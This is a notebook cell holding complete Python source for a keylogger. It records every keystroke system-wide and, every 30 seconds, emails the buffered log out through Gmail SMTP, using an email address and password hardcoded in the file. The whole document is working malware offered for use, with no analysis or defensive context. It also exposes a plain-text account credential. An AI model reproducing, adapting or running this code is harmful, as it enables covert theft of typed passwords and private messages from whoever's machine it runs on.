In [ ]:
import keyboard # for keylogs
import smtplib # for sending email using SMTP protocol (gmail)
# Timer is to make a method runs after an `interval` amount of time
from threading import Timer
from datetime import datetime

SEND_REPORT_EVERY = 30 # in seconds
EMAIL_ADDRESS = "infosecdemo9@gmail.com"
EMAIL_PASSWORD = "9.InfosecDemo"

class Keylogger:
    def __init__(self, interval, report_method="email"):
        # SEND_REPORT_EVERY is passed to interval
        self.interval = interval
        self.report_method = report_method
        # string variable that contains the log of all 
        # the keystrokes within `self.interval`
        self.keys_pressed = ""
        # record start & end datetimes
        self.start_dt = datetime.now()
        self.end_dt = datetime.now()


    def callback(self, event):
        """
        This callback is invoked whenever a key is pressed
        """
        name = event.name
        if len(name) > 1:# not a character, special key (e.g ctrl, alt, etc.)
            if name == "space":
                name = " "  # " " instead of "space"
            elif name == "enter":
                name = "[Enter]\n"  # add a new line whenever an ENTER is pressed
            elif name == "decimal":
                name = "."
            else:
                # replace spaces with underscores
                name = name.replace(" ", "_")
                name = f"[{name.upper()}]"
        # finally, add the key name to our global `self.keys_pressed` variable
        self.keys_pressed += name
    
    def update_filename(self):
        # construct the filename to be identified by start & end datetimes
        start_dt_str = str(self.start_dt)[:-7].replace(" ", "-").replace(":", "")
        end_dt_str = str(self.end_dt)[:-7].replace(" ", "-").replace(":", "")
        self.filename = f"keylog-{start_dt_str}_{end_dt_str}"
        
    def report(self):
        """
        This function gets called every `self.interval`
        It basically sends keylogs and resets `self.keys_pressed` variable
        """
        if self.keys_pressed:
            # if there is something in log, report it
            self.end_dt = datetime.now()
            # update `self.filename`
            self.update_filename()
            self.sendmail(EMAIL_ADDRESS, EMAIL_PASSWORD, self.keys_pressed)
            # print(f"[{self.filename}] - {self.keys_pressed}")
            self.start_dt = datetime.now()
        self.keys_pressed = ""
        timer = Timer(interval=self.interval, function=self.report)
        # set the thread as daemon
        timer.daemon = True
        # start the timer
        timer.start()

    def sendmail(self, email, password, message):
        # manages a connection to an SMTP server
        server = smtplib.SMTP(host="smtp.gmail.com", port=587)
        # connect to the SMTP server as TLS mode
        server.starttls()
        # login to the email account
        server.login(email, password)
        # send the actual message
        server.sendmail(email, email, message)
        # terminates the session
        server.quit()


    def start(self):
        # record the start datetime
        self.start_dt = datetime.now()
        # start the keylogger
        keyboard.on_release(callback=self.callback)
        # start reporting the keylogs
        self.report()
        keyboard.wait()

    
if __name__ == "__main__":
    keylogger = Keylogger(interval=SEND_REPORT_EVERY, report_method="email")
    keylogger.start()
    